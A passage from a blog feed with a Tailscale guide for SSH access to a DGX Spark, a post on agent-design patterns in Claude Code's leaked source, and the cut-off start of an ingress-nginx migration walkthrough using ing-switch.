  sudo tee /usr/share/keyrings/tailscale-archive-keyring.gpg &gt; /dev/null

# Add Tailscale repository
curl -fsSL https://pkgs.tailscale.com/stable/ubuntu/noble.tailscale-keyring.list | \
  sudo tee /etc/apt/sources.list.d/tailscale.list

# Install Tailscale
sudo apt update
sudo apt install -y tailscale
</code></pre>
<p>You'll see the repository being added and the package installing:</p>
<pre><code class="language-plaintext"># Tailscale packages for ubuntu noble
deb [signed-by=/usr/share/keyrings/tailscale-archive-keyring.gpg] https://pkgs.tailscale.com/stable/ubuntu noble main
...
Setting up tailscale (1.94.2) ...
Created symlink /etc/systemd/system/multi-user.target.wants/tailscaled.service → /usr/lib/systemd/system/tailscaled.service.
</code></pre>
<p>Verify the installation:</p>
<pre><code class="language-bash">$ tailscale version
1.94.2
  tailscale commit: 0a29cf18b56e478b9cd33af07755fcae90d5171a
  long version: 1.94.2-t0a29cf18b-g3f044c9f6
  go version: go1.25.5
</code></pre>
<p>Check the service is running:</p>
<pre><code class="language-bash">saiyam@spark-5223:~$ sudo systemctl status tailscaled --no-pager
[sudo] password for saiyam: 
● tailscaled.service - Tailscale node agent
     Loaded: loaded (/usr/lib/systemd/system/tailscaled.service; enabled; preset: enabled)
     Active: active (running) since Tue 2026-04-07 11:13:14 UTC; 9min ago
       Docs: https://tailscale.com/docs/
   Main PID: 2410 (tailscaled)
     Status: "Connected; saiyam911@gmail.com; 100.120.233.78 fd7a:115c:a1e0::f83a:e94e"
      Tasks: 22 (limit: 153561)
     Memory: 45.4M (peak: 53.7M)
        CPU: 615ms
     CGroup: /system.slice/tailscaled.service
             └─2410 /usr/sbin/tailscaled --state=/var/lib/tailscale/tailscaled.…
</code></pre>
<p>The status says "Needs login" — that's expected. We'll authenticate next.</p>
<h2>Step 2: Connect the Spark to Your Tailnet</h2>
<p>This is the magic step:</p>
<pre><code class="language-bash">$ sudo tailscale up

To authenticate, visit:

    https://login.tailscale.com/a/1ff5e3e9017787
</code></pre>
<p>Open that URL in any browser, log in with your account (Google, GitHub, Microsoft — whatever your org uses), and you'll see:</p>
<blockquote>
<p><strong>Login successful. Your device spark-5223 is logged in</strong></p>
</blockquote>
<p>Back on the Spark terminal, you'll see:</p>
<pre><code class="language-plaintext">Success.
Some peers are advertising routes but --accept-routes is false
</code></pre>
<p>That's it on the Spark side. Your DGX Spark is now part of your private Tailscale network with the hostname <code>spark-5223</code>.</p>
<blockquote>
<p><strong>Note:</strong> The <code>--accept-routes</code> message is harmless for SSH access. You can ignore it. If you ever need subnet routing, run <code>sudo tailscale up --accept-routes</code>.</p>
</blockquote>
<h2>Step 3: Install Tailscale on Your Laptop</h2>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/61787831-2a1e-4577-94a2-cdf279c2db4c.png" alt="" style="display:block;margin:0 auto" />

<h3>macOS</h3>
<ul>
<li><p><strong>Option A:</strong> Download from the <a href="https://apps.apple.com/app/tailscale/id1475387142">Mac App Store</a> (search "Tailscale")</p>
</li>
<li><p><strong>Option B:</strong> Download the <code>.pkg</code> from <a href="https://tailscale.com/download">tailscale.com/download</a></p>
</li>
</ul>
<p>Open the app, click <strong>Log in</strong>, and sign in with the <strong>same account</strong> you used on the Spark.</p>
<h3>Windows</h3>
<ol>
<li><p>Download the installer from <a href="https://tailscale.com/download">tailscale.com/download</a></p>
</li>
<li><p>Run the <code>.msi</code> file</p>
</li>
<li><p>Launch Tailscale from the system tray</p>
</li>
<li><p>Log in with the same account</p>
</li>
</ol>
<h3>Linux</h3>
<p>Same commands as the Spark:</p>
<pre><code class="language-bash">sudo apt update
sudo apt install -y curl gnupg

curl -fsSL https://pkgs.tailscale.com/stable/ubuntu/noble.noarmor.gpg | \
  sudo tee /usr/share/keyrings/tailscale-archive-keyring.gpg &gt; /dev/null

curl -fsSL https://pkgs.tailscale.com/stable/ubuntu/noble.tailscale-keyring.list | \
  sudo tee /etc/apt/sources.list.d/tailscale.list

sudo apt update
sudo apt install -y tailscale
sudo tailscale up
</code></pre>
<h2>Step 4: SSH Into Your Spark From Anywhere</h2>
<p>First, confirm both devices see each other:</p>
<pre><code class="language-bash">$ tailscale status
100.104.142.22  spark-5223           saiyamxxx@  linux  -
100.108.115.75  saiyams-macbook-pro  saiyam9xxx@  macOS  -
</code></pre>
<p>You should see your Spark listed. Now, simply:</p>
<pre><code class="language-bash">ssh saiyam@spark-5223
</code></pre>
<p>That's it. Tailscale's <strong>MagicDNS</strong> resolves <code>spark-5223</code> to the right Tailscale IP automatically. No need to remember IP addresses.</p>
<p>If MagicDNS isn't working for some reason, use the Tailscale IP directly:</p>
<pre><code class="language-bash"># Find the IP
tailscale status
# Look for spark-5223 and note the 100.x.x.x address

ssh saiyam@100.104.142.22
</code></pre>
<h3>Setting Up SSH Key Authentication</h3>
<p>For passwordless SSH access, set up key-based authentication. If you already have an SSH key (check <code>~/.ssh/id_ed25519.pub</code> or <code>~/.ssh/id_rsa.pub</code>), add it to the Spark:</p>
<pre><code class="language-bash"># Copy your public key to the Spark (will ask for password once)
ssh-copy-id saiyam@spark-5223
</code></pre>
<p>Or manually add it on the Spark:</p>
<pre><code class="language-bash"># On the Spark — append the public key
echo "your-public-key-here" &gt;&gt; ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
chmod 700 ~/.ssh
</code></pre>
<p>After that, SSH works without a password prompt.</p>
<blockquote>
<p><strong>Note:</strong> Password authentication still works alongside SSH keys. You don't have to choose one or the other.</p>
</blockquote>
<h2>What About My Second Laptop?</h2>
<p>This is the beauty of Tailscale — <strong>just install and log in</strong>:</p>
<ol>
<li><p>Install Tailscale on the second laptop (using the steps above for your OS)</p>
</li>
<li><p>Log in with the same account</p>
</li>
<li><p>Run <code>ssh saiyam@spark-5223</code></p>
</li>
</ol>
<p>No extra configuration on the Spark. Every device on your tailnet can reach every other device automatically.</p>
<h2>Sharing Your Spark With a Friend</h2>
<p>What if a friend also needs SSH access to your Spark — simultaneously, from their own laptop? You don't need to create a new Tailscale account for them. Use a <strong>pre-auth key</strong> to add their device to your tailnet.</p>
<h3>Generate a Pre-Auth Key</h3>
<ol>
<li><p>Go to the <a href="https://login.tailscale.com/admin/settings/keys">Tailscale Admin Console</a></p>
</li>
<li><p>Click <strong>"Generate auth key..."</strong></p>
</li>
<li><p>Enable <strong>Reusable</strong> if you want it to work for multiple devices</p>
</li>
<li><p>Set an expiration as needed</p>
</li>
<li><p>Copy the key (starts with <code>tskey-auth-...</code>)</p>
</li>
</ol>
<h3>Your Friend's Setup (macOS)</h3>
<ol>
<li><p>Install Tailscale from the <a href="https://apps.apple.com/app/tailscale/id1475387142">Mac App Store</a></p>
</li>
<li><p><strong>Important:</strong> If they're already logged in to their own Tailscale account, they need to leave it first:</p>
<pre><code class="language-bash">sudo tailscale logout
</code></pre>
</li>
<li><p>Join your tailnet using the pre-auth key:</p>
<pre><code class="language-bash">sudo tailscale up --auth-key=tskey-auth-xxxxxxxxxxxx
</code></pre>
</li>
<li><p>That's it — their Mac is now on your tailnet. No login, no email needed.</p>
</li>
</ol>
<h3>Add Their SSH Key to the Spark</h3>
<p>Your friend should generate an SSH key on their Mac (if they don't have one):</p>
<pre><code class="language-bash">ssh-keygen -t ed25519
</code></pre>
<p>Then share their public key with you (the contents of <code>~/.ssh/id_ed25519.pub</code>). On the Spark, add it:</p>
<pre><code class="language-bash">echo "ssh-ed25519 AAAA...their-key-here... friend@hostname" &gt;&gt; ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
</code></pre>
<p>Now your friend can SSH in directly:</p>
<pre><code class="language-bash">ssh saiyam@spark-5223
</code></pre>
<p>No password prompt — the key handles authentication automatically. SSH automatically tries keys from the default location (<code>~/.ssh/id_ed25519</code>), so your friend does <strong>not</strong> need to use <code>ssh -i</code>.</p>
<p>Verify it all works:</p>
<pre><code class="language-bash">$ tailscale status
100.104.142.22  spark-5223           saiyamxxx@  linux  -
100.67.209.38   rohits-macbook-pro   saiyamxxx@  macOS  -
100.108.115.75   saiyams-macbook-pro  saiyamxxx@  macOS  -
</code></pre>
<p>Three devices, one tailnet, simultaneous SSH access.</p>
<blockquote>
<p><strong>Tip:</strong> You can manage access from the <a href="https://login.tailscale.com/admin/machines">Tailscale Admin Console</a>. To revoke someone's access, remove their device from the console and delete their key from <code>~/.ssh/authorized_keys</code> on the Spark.</p>
</blockquote>
<h2>Troubleshooting</h2>
<h3>"No Matching Peer" Error</h3>
<p>If your friend gets a "no matching peer" error when trying to SSH, it means <strong>they're on a different tailnet</strong> — not yours.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/55475e51-a4e7-4e4f-816b-91c7fae9c474.png" alt="" style="display:block;margin:0 auto" />

<p>The <code>100.x.x.x</code> Tailscale IPs are only reachable between devices on the <strong>same tailnet</strong>. The fix:</p>
<pre><code class="language-bash"># Friend logs out of their own tailnet
sudo tailscale logout

# Friend joins YOUR tailnet with your pre-auth key
sudo tailscale up --auth-key=tskey-auth-xxxxxxxxxxxx
</code></pre>
<h3>SSH Connection Timeout</h3>
<p>If <code>tailscale ping</code> works but SSH times out:</p>
<pre><code class="language-bash"># On the Spark — check SSH is running
sudo systemctl status ssh

# Check firewall isn't blocking
sudo ufw status

# If SSH isn't running
sudo systemctl start ssh

# If firewall is active and blocking
sudo ufw allow 22/tcp
</code></pre>
<p>Also check SSH is listening on all interfaces:</p>
<pre><code class="language-bash">$ ss -tlnp | grep 22
LISTEN  0  4096  0.0.0.0:22  0.0.0.0:*  users:(("sshd",...))
LISTEN  0  4096     [::]:22     [::]:*  users:(("sshd",...))
</code></pre>
<p>If SSH is only listening on a specific IP, edit <code>/etc/ssh/sshd_config</code> to ensure <code>ListenAddress</code> is not restricted, then <code>sudo systemctl restart ssh</code>.</p>
<h3>Permission Denied (publickey, password)</h3>
<p>This means SSH connected but authentication failed. Either:</p>
<ul>
<li><p>Your SSH key isn't in <code>~/.ssh/authorized_keys</code> on the Spark</p>
</li>
<li><p>You're using a non-default key path (use <code>ssh -i /path/to/key</code>)</p>
</li>
<li><p>Password authentication is disabled in sshd_config</p>
</li>
</ul>
<p>Check the authorized keys on the Spark:</p>
<pre><code class="language-bash">cat ~/.ssh/authorized_keys
</code></pre>
<p>Make sure your public key is listed there.</p>
<h2>Useful Commands Cheat Sheet</h2>
<table>
<thead>
<tr>
<th>Command</th>
<th>What it does</th>
</tr>
</thead>
<tbody><tr>
<td><code>tailscale status</code></td>
<td>List all devices on your tailnet</td>
</tr>
<tr>
<td><code>tailscale ping spark-5223</code></td>
<td>Test connectivity to a device</td>
</tr>
<tr>
<td><code>tailscale ip</code></td>
<td>Show your device's Tailscale IP</td>
</tr>
<tr>
<td><code>ssh saiyam@spark-5223</code></td>
<td>SSH using MagicDNS hostname</td>
</tr>
<tr>
<td><code>sudo tailscale up</code></td>
<td>Connect to tailnet</td>
</tr>
<tr>
<td><code>sudo tailscale down</code></td>
<td>Disconnect from tailnet</td>
</tr>
<tr>
<td><code>sudo tailscale logout</code></td>
<td>Leave the current tailnet entirely</td>
</tr>
<tr>
<td><code>ssh-copy-id saiyam@spark-5223</code></td>
<td>Copy your SSH key to the Spark</td>
</tr>
</tbody></table>
<h2>Pro Tips</h2>
<ol>
<li><p><strong>Tailscale starts on boot</strong> — the <code>tailscaled</code> service is enabled by default, so your Spark will rejoin the tailnet automatically after a reboot.</p>
</li>
<li><p><strong>Forward ports for Jupyter</strong> — if you run JupyterLab on your Spark:</p>
<pre><code class="language-bash">ssh -L 8888:localhost:8888 saiyam@spark-5223
</code></pre>
<p>Then open <code>http://localhost:8888</code> in your browser.</p>
</li>
<li><p><strong>File transfers work too:</strong></p>
<pre><code class="language-bash">scp model.bin saiyam@spark-5223:~/models/
</code></pre>
</li>
<li><p><strong>Check who's connected</strong> — on the Spark, see active SSH sessions:</p>
<pre><code class="language-bash">who
</code></pre>
</li>
<li><p><strong>Tailscale admin console</strong> — monitor all devices, manage keys, and remove devices at <a href="https://login.tailscale.com/admin">login.tailscale.com/admin</a>.</p>
</li>
</ol>
<h2>Cleanup (If Needed)</h2>
<p>If you ever want to remove Tailscale from your Spark:</p>
<pre><code class="language-bash">sudo tailscale down
sudo apt remove --purge tailscale
sudo rm /etc/apt/sources.list.d/tailscale.list
sudo rm /usr/share/keyrings/tailscale-archive-keyring.gpg
sudo apt update
</code></pre>
<p>To restore: re-run installation steps 1-2.</p>
<h2>Wrapping Up</h2>
<p>The whole setup took me about 10 minutes. Now I can SSH into my DGX Spark from my MacBook at home, my second laptop on the go, and even my friend can access it simultaneously from his MacBook — all without any port forwarding, static IPs, or VPN servers.</p>
<p>The key takeaways:</p>
<ul>
<li><p><strong>For yourself:</strong> Install Tailscale on both devices, log in with the same account, <code>ssh</code> in</p>
</li>
<li><p><strong>For friends:</strong> Generate a pre-auth key, have them join your tailnet, add their SSH public key to the Spark</p>
</li>
<li><p><strong>Troubleshooting:</strong> Make sure all devices are on the same tailnet, SSH is running, and keys are in <code>authorized_keys</code></p>
</li>
</ul>
<p>Just <code>ssh saiyam@spark-5223</code> — from anywhere in the world.</p>
<p>I also used this at 30000 feet in the air!</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/1414da6d-8abe-4012-941e-081e310a16d4.png" alt="" style="display:block;margin:0 auto" />
<p><a class="embed-card" href="https://x.com/SaiyamPathak/status/2032098978213528037?s=20">https://x.com/SaiyamPathak/status/2032098978213528037?s=20</a></p>
]]></content:encoded></item><item><title><![CDATA[What Claude Code's Leaked Source Actually Teaches Us About Building AI Agents]]></title><description><![CDATA[Let me start with the honest version of what happened.
Yesterday, Anthropic accidentally published a 59.8 MB source map file inside version 2.1.88 of their @anthropic-ai/claude-code npm package. The b]]></description><link>https://blog.kubesimplify.com/claude-code-leak-what-the-source-actually-teaches</link><guid isPermaLink="true">https://blog.kubesimplify.com/claude-code-leak-what-the-source-actually-teaches</guid><category><![CDATA[ai agents]]></category><category><![CDATA[claude-code]]></category><category><![CDATA[TypeScript]]></category><category><![CDATA[AI Engineering]]></category><category><![CDATA[llm]]></category><dc:creator><![CDATA[Saiyam Pathak]]></dc:creator><pubDate>Wed, 01 Apr 2026 15:13:33 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/0582a05f-42f3-4b97-8512-9c2133603126.svg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Let me start with the honest version of what happened.</p>
<p>Yesterday, Anthropic accidentally published a 59.8 MB source map file inside version 2.1.88 of their <code>@anthropic-ai/claude-code</code> npm package. The build pipeline was configured to generate source maps, and the packaging step — whether it was a missing <code>.npmignore</code> rule or a misconfigured <code>files</code> field in <code>package.json</code> — failed to exclude them. One packaging oversight, and ~512,000 lines of TypeScript source were public. Anthropic's DMCA notice eventually took down over 8,100 GitHub repositories. A clean-room rewrite called <a href="https://github.com/instructkr/claw-code">claw-code</a> hit 50,000 stars in about two hours and now about 100k+.</p>
<p>Within last 24 hours, the internet was flooded with hot takes. Architecture diagrams. The virtual pet system. Thread after thread of "I read the entire codebase and here's what I found." Sites like <a href="https://ccunpacked.dev">ccunpacked.dev</a> did genuinely good visual walkthroughs of the high-level structure.</p>
<p>But let's be real — nobody read 512,000 lines of TypeScript. I certainly didn't, and I'm skeptical of anyone who claims they did. What I did do was feed the source into Claude, systematically analyzed the key modules, cross-referenced what I found against public documentation and other analyses, and verified the claims I'm about to make against the actual code. If you've read other "I analyzed the leak" posts, they probably all used a similar workflow. The difference I'm going for here is honesty about the process.</p>
<hr />
<h2>The Core Loop Is a State Machine, and That's the Whole Point</h2>
<p>The agent loop lives in <code>query.ts</code>. It's exactly 1,729 lines (I checked), structured as an async generator function called <code>queryLoop</code> wrapping a <code>while(true)</code> loop. The code itself, in an internal comment, references "7 continue sites" — seven distinct points where the loop yields control and decides what to do next.</p>
<p>The actual function signature:</p>
<pre><code class="language-typescript">async function* queryLoop(
  params: QueryParams,
  consumedCommandUuids: string[],
): AsyncGenerator&lt;
  StreamEvent | RequestStartEvent | Message | TombstoneMessage | ToolUseSummaryMessage,
  Terminal
&gt;
</code></pre>
<p>Why does this matter? Because most agent frameworks treat the LLM call as the center of gravity. Send a prompt, get a response, run a tool, repeat. That works fine for demos. It falls apart the moment you need to pause a session, resume it later, serialize state, handle errors mid-turn, or compose multiple agents together.</p>
<p>The generator pattern makes every loop iteration an explicit state transition. You can yield control at each of the seven points without losing state. You can test individual stages. You can add compaction, permission checks, or budget tracking as stages rather than side effects bolted onto a callback chain.</p>
<p>If you're building an agent and your core loop is a simple <code>while</code> with <code>await model.chat()</code> in the middle, this is the pattern to study.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/87e9c4e9-9bfd-44ac-bdc0-f9fbf5c3d30b.png" alt="" style="display:block;margin:0 auto" />

<h2>Five Compaction Strategies (Not a Neat Stack)</h2>
<p>Every long-running agent eventually fills its context window. Most frameworks handle this by truncating old messages. Claude Code has five distinct strategies — though I want to be clear, these aren't a clean "Layer 1 through 5" hierarchy like some other posts have described. They're composable strategies that kick in under different conditions:</p>
<p><strong>Snip</strong> prunes older messages for quick headroom. Fast and lossy.</p>
<p><strong>Microcompact</strong> targets tool outputs specifically. A 5,000-line file read gets saved to disk; the model sees a summary with a reference. Two implementations handle this: <code>microCompact.ts</code> and <code>apiMicrocompact.ts</code>. This alone is a big deal — a single uncompressed tool output can eat half your context window.</p>
<p><strong>Context Collapse</strong> progressively compresses older conversation segments while keeping recent context sharp. It's still behind a <code>CONTEXT_COLLAPSE</code> feature flag, with dedicated persistence types (<code>ContextCollapseCommitEntry</code>, <code>ContextCollapseSnapshotEntry</code>) to survive session restarts. Not yet fully shipped.</p>
<p><strong>Autocompact</strong> is full-conversation summarization at configurable token thresholds. Replaces older history with a summary.</p>
<p><strong>Reactive Compact</strong> is the emergency brake — behind the <code>REACTIVE_COMPACT</code> feature flag. When the API returns a 413 (payload too large), this aggressively compacts everything so your session doesn't die. Without this, one bad tool output would brick the conversation.</p>
<p>Now, I've seen posts claiming "no other framework has this." That was arguably true in 2025, but it's not true now. Microsoft's <a href="https://learn.microsoft.com/en-us/agent-framework/agents/conversations/compaction">Agent Framework</a> has composable multi-strategy compaction pipelines. <a href="https://blog.langchain.com/context-management-for-deepagents/">LangChain Deep Agents</a> (shipped March 15, 2026) does filesystem offloading plus multi-frequency summarization. <a href="https://google.github.io/adk-docs/context/compaction/">Google ADK</a> has sliding window with summarization.</p>
<p>What sets Claude Code apart isn't that it has compaction — it's the granularity. Five strategies, two of them still being iterated on behind feature flags. That reflects the kind of edge cases you only discover at scale.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/17d6086b-cbcc-41f9-8fe6-23f9e71b817d.png" alt="" style="display:block;margin:0 auto" />

<h2>Deferred Tool Loading</h2>
<p>This is probably the most practical pattern in the codebase for anyone building agents.</p>
<p>When you connect MCP servers, you might have 200+ tools available. Sending all those schemas on every API call wastes thousands of tokens. Claude Code's solution: mark tools with <code>defer_loading: true</code>. The model doesn't see them. Instead, it has a single meta-tool called <code>ToolSearch</code> (the internal class is <code>ToolSearchTool</code>, but the model-facing name is <code>ToolSearch</code> — defined as <code>TOOL_SEARCH_TOOL_NAME = 'ToolSearch'</code> in the constants). When the model needs a capability, it calls <code>ToolSearch</code> with a query:</p>
<pre><code class="language-plaintext">User: "Deploy this to my Kubernetes cluster"

Model calls ToolSearch("kubernetes deploy")
  -&gt; System fuzzy-matches deferred tool descriptions
  -&gt; Injects matching schemas into the conversation
Model now has the tools it needs.
</code></pre>
<p>The model goes from ~20 core tools to access to hundreds, without the upfront token cost.</p>
<p>This pattern has spread. The <a href="https://developers.openai.com/api/docs/guides/tools-tool-search">OpenAI Agents SDK</a> now has <code>deferLoading: true</code> with tool search (requires GPT-5.4+). <a href="https://github.com/zeroclaw-labs/zeroclaw">ZeroClaw</a> implements nearly identical deferred loading. <a href="https://github.com/crewAIInc/crewAI/pull/4779">CrewAI 1.10.2a1</a> (March 2026) added dynamic tool injection via Anthropic's tool search API.</p>
<p>But there's still no framework-agnostic library for this. The core is straightforward — fuzzy matching over tool descriptions, schema injection on demand, MCP compatibility. If someone built this as a standalone package, it'd be useful immediately.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/0fde2eb1-f66e-48a9-acce-646add485209.png" alt="" style="display:block;margin:0 auto" />

<hr />
<h2>Default-Deny Permissions With a Graceful Fallback</h2>
<p>Claude Code's permission system is built on default-deny. Every tool has two permission-relevant properties defined in <code>Tool.ts</code>:</p>
<ul>
<li><p><code>isReadOnly</code> — defaults to <code>false</code> (assume the tool writes)</p>
</li>
<li><p><code>isDestructive</code> — defaults to <code>false</code></p>
</li>
</ul>
<p>Tools must explicitly declare their risk profile. The permission system then layers rule-based checks (<code>alwaysAllow</code>/<code>alwaysDeny</code> rules), pre-tool-use hooks (which can modify input, block execution, or log), and an auto-mode safety classifier.</p>
<p>The part I found most interesting is the denial tracking in <code>denialTracking.ts</code> — just 46 lines:</p>
<pre><code class="language-plaintext">3 consecutive denials → shouldFallbackToPrompting() returns true
20 total denials in a session → same result
</code></pre>
<p>If the user keeps saying "no," the system stops running in auto-mode and starts asking for explicit permission on every action. Most agent frameworks either keep retrying or hard-stop. Claude Code's approach gracefully degrades: "You're uncomfortable with what I'm doing, so I'll check before each step."</p>
<p>Small file, big principle.</p>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/69f00384-911e-4f22-b886-a52b934bc576.png" alt="" style="display:block;margin:0 auto" />

<hr />
<h2>The Cost Engineering</h2>
<p>These are the details that only matter at Anthropic's scale, but they're instructive:</p>
<p><strong>Sticky-on latches.</strong> When a feature flag activates during a session, it stays on for the rest of that session. Flipping it back would change the system prompt, which busts the prompt cache. The <code>promptCacheBreakDetection.ts</code> file tracks 14 distinct state fields that can invalidate the cache — system prompt hash, tool schema hashes, model changes, beta headers, effort values, and more. Sticky latches prevent unnecessary cache invalidation from mode toggles.</p>
<p><strong>Tool result persistence.</strong> Large outputs get written to disk; the model sees a preview. This isn't just context management — it keeps the cache prefix stable.</p>
<p><strong>Schema stability.</strong> Tool schemas assembled once at session start, held stable throughout. MCP tools can come and go, but the core schema block doesn't change.</p>
<p>At scale, these optimizations compound significantly.</p>
<hr />
<h2>What I Actually Took Away From This</h2>
<p>I'm not going to pretend the leak is a startup idea list or that I discovered things nobody else saw. But analyzing the code did crystallize a few things:</p>
<p><strong>Context management is harder than it looks.</strong> Five strategies, two still behind feature flags, a dedicated <code>promptCacheBreakDetection.ts</code> tracking 14 vectors. This is not a solved problem, even for Anthropic.</p>
<p><strong>Deferred tool loading is becoming table stakes.</strong> Claude Code, OpenAI, ZeroClaw, CrewAI — multiple teams independently arrived at the same pattern. If you're building an agent with more than ~20 tools and you're not doing this, you're wasting tokens.</p>
<p><strong>Permission design matters more than permission features.</strong> The denial tracking system is 46 lines. The principle it encodes — "degrade gracefully when the user loses trust" — is more important than any specific implementation detail.</p>
<p><strong>The real work is in the orchestration.</strong> The model call is one stage out of seven in the main loop. Everything else — state management, compaction, tool loading, permissions, cost optimization — is where the engineering actually lives.</p>
<hr />
<h2>Being Honest About the Process</h2>
<p>Every blog you've read about this leak was written with AI assistance. This one included. I used Claude to analyze the source modules, identify patterns, and draft the initial structure. I then fact-checked every claim — cross-referencing the actual source code, public documentation, news coverage, and other technical analyses. Where I found errors in my initial draft (and there were several), I corrected them.</p>
<p>The value isn't in pretending I manually read half a million lines of code. It's in doing the verification work to make sure what I'm telling you is actually true. In a sea of AI-generated analysis of AI-generated code, accuracy is the differentiator.</p>
<p>If you spot something wrong, tell me — I'd rather correct it than let it stand.</p>
<p><em>I write about cloud-native, AI engineering, and the infrastructure that makes modern software work. Find me on</em> <a href="https://twitter.com/SaiyamPathak"><em>Twitter</em></a> <em>or</em> <a href="https://linkedin.com/in/saiyampathak"><em>LinkedIn</em></a><em>.</em></p>
]]></content:encoded></item><item><title><![CDATA[The Ingress NGINX Migration Just Got Easier: 119 Annotations, 3 Targets, Impact Ratings]]></title><description><![CDATA[A few months ago, I built ing-switch and wrote about it on kubesimplify. The response was incredible -- people loved the annotation mapping and the visual dashboard.
Since then, ingress-nginx was offi]]></description><link>https://blog.kubesimplify.com/ing-switch-119-annotations-gateway-api-traefik-impact-ratings</link><guid isPermaLink="true">https://blog.kubesimplify.com/ing-switch-119-annotations-gateway-api-traefik-impact-ratings</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Devops]]></category><category><![CDATA[Gateway API]]></category><category><![CDATA[Traefik]]></category><category><![CDATA[ingress-nginx]]></category><category><![CDATA[cloud native]]></category><category><![CDATA[migration]]></category><dc:creator><![CDATA[Saiyam Pathak]]></dc:creator><pubDate>Mon, 30 Mar 2026 12:30:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/a6561232-6f6b-451c-86ca-bbf693fbb9a6.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>A few months ago, I built <a href="https://github.com/saiyam1814/ing-switch">ing-switch</a> and <a href="https://blog.kubesimplify.com/ing-switch-migrate-from-ingress-nginx-to-traefik-or-gateway-api-in-minutes-not-days">wrote about it on kubesimplify</a>. The response was incredible -- people loved the annotation mapping and the visual dashboard.</p>
<p>Since then, <strong>ingress-nginx was officially archived</strong> (March 24, 2026). March 31 is end of life -- zero security patches after that date.</p>
<p>Based on community feedback from KubeCon, this is the biggest update yet: <strong>119 annotations</strong> (up from 50), <strong>Gateway API with Traefik as the provider</strong> (the #1 request), and <strong>impact ratings</strong> on every annotation so you know exactly what matters.</p>
<p>This post walks through a <strong>complete end-to-end migration</strong> on a <a href="https://github.com/loft-sh/vind">vind</a> cluster with actual command outputs.</p>
<h2>Why You Need to Migrate Now</h2>
<ul>
<li><p><strong>Nov 11, 2025:</strong> Kubernetes SIG Network announces ingress-nginx retirement</p>
</li>
<li><p><strong>Jan 29, 2026:</strong> Joint statement from Kubernetes Steering + Security Response Committees urging immediate migration</p>
</li>
<li><p><strong>Mar 24, 2026:</strong> GitHub repository archived (read-only)</p>
</li>
<li><p><strong>Mar 31, 2026:</strong> End of life -- zero support from this date</p>
</li>
</ul>
<p>Chainguard maintains a fork for CVE-level fixes only -- no features, no community PRs, no pre-built images. You're on your own.</p>
<h2>The Three Migration Paths</h2>
<img src="https://cdn.hashnode.com/uploads/covers/5ef48fe2877d056386648ab2/eeadef24-e6cd-455a-847c-34fedd6cd96e.png" alt="" style="display:block;margin:0 auto" />

<table>
<thead>
<tr>
<th>Target</th>
<th>Best For</th>
<th>What Changes</th>
</tr>
</thead>
<tbody><tr>
<td><strong>Traefik v3</strong></td>
<td>Fastest migration, lowest friction</td>
<td>Keep Ingress API, swap annotations to Middleware CRDs</td>
</tr>
<tr>
<td><strong>Gateway API (Envoy)</strong></td>
<td>Future-proof standard</td>
<td>Replace Ingresses with HTTPRoutes, Envoy policies</td>
</tr>
<tr>
<td><strong>Gateway API (Traefik)</strong></td>
<td>Rancher / k3s users</td>
<td>Standard HTTPRoutes + Gateway resources, with Traefik as the controller implementation. Advanced features (rate limiting, auth, IP filtering) use Traefik Middleware CRDs as extension policies.</td>
</tr>
</tbody></table>
<h2>The Annotation Problem</h2>
<p>The real complexity isn't swapping controllers -- it's the <strong>annotations</strong>. A typical production Ingress has 10-15 NGINX annotations for SSL, auth, rate limiting, CORS, session affinity, and more.</p>
<p>ing-switch maps <strong>119 annotations</strong> with impact ratings:</p>
<table>
<thead>
<tr>
<th></th>
<th>Traefik</th>
<th>Gateway API</th>
</tr>
</thead>
<tbody><tr>
<td>Supported (direct equivalent)</td>
<td>35</td>
<td>39</td>
</tr>
<tr>
<td>Partial (needs minor adjustment)</td>
<td>48</td>
<td>25</td>
</tr>
<tr>
<td>Unsupported (with impact notes)</td>
<td>42</td>
<td>62</td>
</tr>
</tbody></table>
<p>Every unsupported annotation gets an <strong>impact rating</strong>: <code>NONE</code> (safe to ignore), <code>LOW</code> (better defaults), <code>MEDIUM</code> (needs workaround), or <code>VARIES</code> (review your snippets). Most teams discover <strong>70%+ of "unsupported" annotations are safe to ignore</strong>.</p>
<h2>End-to-End Demo: vCluster + ing-switch</h2>
<p><a href="https://asciinema.org/a/nOYDQukAC4bzdSVI"><img src="https://asciinema.org/a/nOYDQukAC4bzdSVI.svg" alt="asciicast" style="display:block;margin:0 auto" /></a></p>
<p>Let's walk through a complete migration on a real cluster. We'll use <a href="https://www.vcluster.com/">vCluster</a> to spin up a Kubernetes cluster in Docker, deploy 3 services with NGINX annotations, and migrate them to Gateway API with Traefik.</p>
<h3>Step 1: Create a Cluster</h3>
<pre><code class="language-bash">vcluster create demo --driver docker
</code></pre>
<p>Output:</p>
<pre><code class="language-text">info  Using vCluster driver 'docker' to create your virtual clusters
info  Ensuring environment for vCluster demo...
done  Created network vcluster.demo
info  Starting vCluster standalone demo
done  Successfully created virtual cluster demo
info  Waiting for vCluster to become ready...
done  vCluster is ready
done  Switched active kube context to vcluster-docker_demo
</code></pre>
<p>Verify:</p>
<pre><code class="language-bash">kubectl get namespaces
</code></pre>
<pre><code class="language-text">NAME                 STATUS   AGE
default              Active   16s
kube-flannel         Active   6s
kube-node-lease      Active   16s
kube-public          Active   16s
kube-system          Active   16s
local-path-storage   Active   6s
</code></pre>
<h3>Step 2: Install Ingress NGINX</h3>
<pre><code class="language-bash">helm repo add ingress-nginx https://kubernetes.github.io/ingress-nginx
helm install ingress-nginx ingress-nginx/ingress-nginx \
  --namespace ingress-nginx \
  --create-namespace \
  --set controller.service.type=ClusterIP \
